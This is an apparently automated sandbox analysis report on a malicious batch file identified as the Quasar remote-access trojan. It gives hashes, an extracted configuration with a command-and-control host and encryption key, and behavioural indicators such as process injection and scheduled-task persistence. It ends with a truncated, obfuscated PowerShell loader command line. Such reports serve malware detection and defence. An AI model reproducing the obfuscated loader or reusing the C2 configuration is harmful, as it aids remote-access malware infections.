Analysis
  max time kernel: 300s
  max time network: 293s
  platform: windows11-21h2_x64
  resource: win11-20240426-en
  resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
  submitted: 28-05-2024 13:42

Static task: static1

Behavioral task: behavioral1
  Sample: New1.bat
  Resource: win10-20240404-en

Behavioral task: behavioral2
  Sample: New1.bat
  Resource: win10v2004-20240508-en
General
  Target: New1.bat
  Size: 1002KB
  MD5: f6d5bfaee8a55ff72c7b453fda066d62
  SHA1: 7d737d53013990e5d05076b7206e43eb4793fc7f
  SHA256: 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
  SHA512: e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284
  SSDEEP: 12288:NzPPeJOTZMGuIl99I2FxGwvYXDSeengmfn5tKvy0H5JbcGfRZIJZ32hxnQxCGaF9:NDeYum99IGP8f2rRO5JFPIJZ8GaF8XmB
Malware Config

Extracted: quasar
  reconnect_delay: 3000

Extracted: quasar 3.1.5
  Video
  runderscore00-25501.portmap.host:25501
  $Sxr-oWTh3ZS9htfe80iIl5
  encryption_key: zK8u0rpHf4TJzGf65Flt
  install_name: Win11.exe
  log_directory: $sxr-Logs
  reconnect_delay: 3000
  startup_key: Windows 11 Boot
  subdirectory: Win11
Signatures

- Quasar payload (4 IoCs)
  resource | yara_rule
  behavioral3/memory/4964-22-0x00000000089D0000-0x0000000008AC2000-memory.dmp | family_quasar
  behavioral3/memory/3448-79-0x0000000008E60000-0x0000000008ECC000-memory.dmp | family_quasar
  behavioral3/memory/2888-98-0x0000000000900000-0x000000000096C000-memory.dmp | family_quasar
  C:\Users\Admin\AppData\Local\Temp\New.exe | family_quasar

- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | process | target process
  PID 1916 created 640 | 1916 | powershell.EXE | winlogon.exe

- Blocklisted process makes network request (2 IoCs)
  flow | pid | process
  4 | 3448 | powershell.exe
  5 | 3448 | powershell.exe

- Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
  Run Powershell and hide display window.
  pid | process
  4964 | powershell.exe
  2404 | powershell.exe
  3448 | powershell.exe

- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe

- Executes dropped EXE (2 IoCs)
  pid | process
  4872 | Install.exe
  2888 | New.exe

- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  2 | ip-api.com

- Drops file in System32 directory (13 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe

- Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 1916 set thread context of 1864 | 1916 | powershell.EXE | dllhost.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Modifies data under HKEY_USERS (53 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe

- Modifies registry class (1 IoC)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | powershell.exe

- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | process
  4964 | powershell.exe
  4964 | powershell.exe
  2404 | powershell.exe
  2404 | powershell.exe
  3448 | powershell.exe
  3448 | powershell.exe
  1916 | powershell.EXE
  1916 | powershell.EXE
  1916 | powershell.EXE
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  3448 | powershell.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  3448 | powershell.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  3448 | powershell.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  2968 | wmiprvse.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  3448 | powershell.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe
  1864 | dllhost.exe

- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | process
  3228 | Explorer.EXE

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 4964 | powershell.exe
  Token: SeDebugPrivilege | 2404 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2404 | powershell.exe
  Token: SeSecurityPrivilege | 2404 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2404 | powershell.exe
  Token: SeLoadDriverPrivilege | 2404 | powershell.exe
  Token: SeSystemProfilePrivilege | 2404 | powershell.exe
  Token: SeSystemtimePrivilege | 2404 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2404 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2404 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2404 | powershell.exe
  Token: SeBackupPrivilege | 2404 | powershell.exe
  Token: SeRestorePrivilege | 2404 | powershell.exe
  Token: SeShutdownPrivilege | 2404 | powershell.exe
  Token: SeDebugPrivilege | 2404 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2404 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2404 | powershell.exe
  Token: SeUndockPrivilege | 2404 | powershell.exe
  Token: SeManageVolumePrivilege | 2404 | powershell.exe
  Token: 33 | 2404 | powershell.exe
  Token: 34 | 2404 | powershell.exe
  Token: 35 | 2404 | powershell.exe
  Token: 36 | 2404 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2404 | powershell.exe
  Token: SeSecurityPrivilege | 2404 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2404 | powershell.exe
  Token: SeLoadDriverPrivilege | 2404 | powershell.exe
  Token: SeSystemProfilePrivilege | 2404 | powershell.exe
  Token: SeSystemtimePrivilege | 2404 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2404 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2404 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2404 | powershell.exe
  Token: SeBackupPrivilege | 2404 | powershell.exe
  Token: SeRestorePrivilege | 2404 | powershell.exe
  Token: SeShutdownPrivilege | 2404 | powershell.exe
  Token: SeDebugPrivilege | 2404 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2404 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2404 | powershell.exe
  Token: SeUndockPrivilege | 2404 | powershell.exe
  Token: SeManageVolumePrivilege | 2404 | powershell.exe
  Token: 33 | 2404 | powershell.exe
  Token: 34 | 2404 | powershell.exe
  Token: 35 | 2404 | powershell.exe
  Token: 36 | 2404 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2404 | powershell.exe
  Token: SeSecurityPrivilege | 2404 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2404 | powershell.exe
  Token: SeLoadDriverPrivilege | 2404 | powershell.exe
  Token: SeSystemProfilePrivilege | 2404 | powershell.exe
  Token: SeSystemtimePrivilege | 2404 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2404 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2404 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2404 | powershell.exe
  Token: SeBackupPrivilege | 2404 | powershell.exe
  Token: SeRestorePrivilege | 2404 | powershell.exe
  Token: SeShutdownPrivilege | 2404 | powershell.exe
  Token: SeDebugPrivilege | 2404 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2404 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2404 | powershell.exe
  Token: SeUndockPrivilege | 2404 | powershell.exe
  Token: SeManageVolumePrivilege | 2404 | powershell.exe
  Token: 33 | 2404 | powershell.exe
  Token: 34 | 2404 | powershell.exe
  Token: 35 | 2404 | powershell.exe

- Suspicious use of SetWindowsHookEx (1 IoC)
  pid | process
  3448 | powershell.exe

- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | process | target process
  PID 1096 wrote to memory of 4964 | 1096 | cmd.exe | powershell.exe
  PID 1096 wrote to memory of 4964 | 1096 | cmd.exe | powershell.exe
  PID 1096 wrote to memory of 4964 | 1096 | cmd.exe | powershell.exe
  PID 4964 wrote to memory of 2404 | 4964 | powershell.exe | powershell.exe
  PID 4964 wrote to memory of 2404 | 4964 | powershell.exe | powershell.exe
  PID 4964 wrote to memory of 2404 | 4964 | powershell.exe | powershell.exe
  PID 4964 wrote to memory of 2700 | 4964 | powershell.exe | WScript.exe
  PID 4964 wrote to memory of 2700 | 4964 | powershell.exe | WScript.exe
  PID 4964 wrote to memory of 2700 | 4964 | powershell.exe | WScript.exe
  PID 2700 wrote to memory of 4160 | 2700 | WScript.exe | cmd.exe
  PID 2700 wrote to memory of 4160 | 2700 | WScript.exe | cmd.exe
  PID 2700 wrote to memory of 4160 | 2700 | WScript.exe | cmd.exe
  PID 4160 wrote to memory of 3448 | 4160 | cmd.exe | powershell.exe
  PID 4160 wrote to memory of 3448 | 4160 | cmd.exe | powershell.exe
  PID 4160 wrote to memory of 3448 | 4160 | cmd.exe | powershell.exe
  PID 3448 wrote to memory of 4872 | 3448 | powershell.exe | Install.exe
  PID 3448 wrote to memory of 4872 | 3448 | powershell.exe | Install.exe
  PID 3448 wrote to memory of 4872 | 3448 | powershell.exe | Install.exe
  PID 3448 wrote to memory of 2888 | 3448 | powershell.exe | New.exe
  PID 3448 wrote to memory of 2888 | 3448 | powershell.exe | New.exe
  PID 3448 wrote to memory of 2888 | 3448 | powershell.exe | New.exe
  PID 2888 wrote to memory of 1392 | 2888 | New.exe | SCHTASKS.exe
  PID 2888 wrote to memory of 1392 | 2888 | New.exe | SCHTASKS.exe
  PID 2888 wrote to memory of 1392 | 2888 | New.exe | SCHTASKS.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1916 wrote to memory of 1864 | 1916 | powershell.EXE | dllhost.exe
  PID 1864 wrote to memory of 640 | 1864 | dllhost.exe | winlogon.exe
  PID 1864 wrote to memory of 700 | 1864 | dllhost.exe | lsass.exe
  PID 1864 wrote to memory of 1000 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 560 | 1864 | dllhost.exe | dwm.exe
  PID 1864 wrote to memory of 900 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1028 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1036 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1088 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1148 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1244 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1252 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1328 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1372 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1472 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1544 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1612 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1636 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1736 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1744 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1780 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1856 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1888 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1972 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1984 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1520 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 1828 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 2092 | 1864 | dllhost.exe | spoolsv.exe
  PID 1864 wrote to memory of 2264 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 2416 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 2500 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 2508 | 1864 | dllhost.exe | svchost.exe
  PID 1864 wrote to memory of 2556 | 1864 | dllhost.exe | svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{62580871-809d-4acd-8bc6-8c7116bf403e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FveygWzWfzez{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RgHMHfomuIygpT,[Parameter(Position=1)][Type]$reztmTlFgm)$PCRfYmpIEQB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+''+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+'e'+''+[Char](109)+'o'+'r'+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+'e'+'g'+[Char](97)+'teT'+[Char](121)+''+'p'+'e','Cl'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c,S'+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PCRfYmpIEQB.DefineConstructor('RTS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'l'+'N'+'a'+'m'+''+[Char](101)+',H'+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$RgHMHfomuIygpT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+'m'+''+'e'+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$PCRfYmpIEQB.DefineMethod('In'+'v'+''+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+''+','+''+[Char](72)+'id'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+'g'+''+','+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',Vi'+[Char](114)+''+[Char](116)+''+
[Char](117)+''+'a'+'l',$reztmTlFgm,$RgHMHfomuIygpT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+'an'+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $PCRfYmpIEQB.CreateType();}$mLEOSOvHxyzZT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('Mi'+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$XSODmByomeFYhI=$mLEOSOvHxyzZT.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JlGxeElggKGGKDqObkC=FveygWzWfzez @([String])([IntPtr]);$FTxdBemZQCPbOlMLVcPtpl=FveygWzWfzez 
